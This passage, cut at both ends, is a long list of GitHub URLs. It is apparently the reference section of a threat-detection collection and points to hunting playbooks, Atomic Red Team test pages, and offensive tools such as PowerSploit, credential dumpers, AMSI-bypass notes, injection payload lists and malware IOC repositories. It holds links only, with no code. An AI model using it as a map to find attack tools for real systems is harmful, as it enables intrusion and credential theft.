/OTRF/detection-hackathon-apt29/issues/17\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/6\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/7\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/8\nhttps://github.com/OTRF/detection-hackathon-apt29/issues/9\nhttps://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml\nhttps://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md\nhttps://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml\nhttps://github.com/outflanknl/Dumpert\nhttps://github.com/outflanknl/NetshHelperBeacon\nhttps://github.com/p0dalirius/LDAPmonitor\nhttps://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1\nhttps://github.com/p3nt4/PowerShdll\nhttps://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md\nhttps://github.com/pathtofile/bad-bpf\nhttps://github.com/payloadbox/sql-injection-payload-list\nhttps://github.com/payloadbox/ssti-payloads\nhttps://github.com/payloadbox/xss-payload-list\nhttps://github.com/Pennyw0rth/NetExec/\nhttps://github.com/pimps/JNDI-Exploit-Kit\nhttps://github.com/Porchetta-Industries/CrackMapExec\nhttps://github.com/poweradminllc/PAExec\nhttps://github.com/PowerShellMafia/PowerSploit\nhttps://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1\nhttps://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1\nhttps://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1\nhttps://github.com/PowerShellMafia/PowerSploit/tree/master/Recon\nhttps://github.com/pr0xylife/DarkGate/tree/main\nhttps://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt\nhttps://github.com/pr0xylife/Pikabot\nhttps://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt\nhttps://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt\nhttps://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt\nhttps://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_30.10.2023.txt\nhttps://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt\nhttps://github.com/pr0xylife/Qakbot/\nhttps://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt\nhttps://github.com/projectdiscovery/naabu\nhttps://github.com/projectdiscovery/nuclei-templates\nhttps://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml\nhttps://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml\nhttps://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699\nhttps://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf\nhttps://github.com/quarkslab/quarkspwdump\nhttps://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi\nhttps://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass\nhttps://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-\nhttps://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb\nhttps://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb\nhttps://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430\nhttps://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1\nhttps://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1\nhttps://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb\nhttps://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb\nhttps://github.com/rapid7/metasploit-framework/pull/17407\nhttps://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist\nhttps://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci\nhttps://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects\nhttps://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file\nhttps://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl\nhttps://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nhttps://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid\nhttps://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest\nhttps://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation\nhttps://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials\nhttps://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile\nhttps://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup\nhttps://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1\nhttps://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery\nhttps://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic\nhttps://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey\nhttps://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/c4097dc7ed14d7f7d08c89d148c4307097e8c294/atomics/T1486/T1486.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fe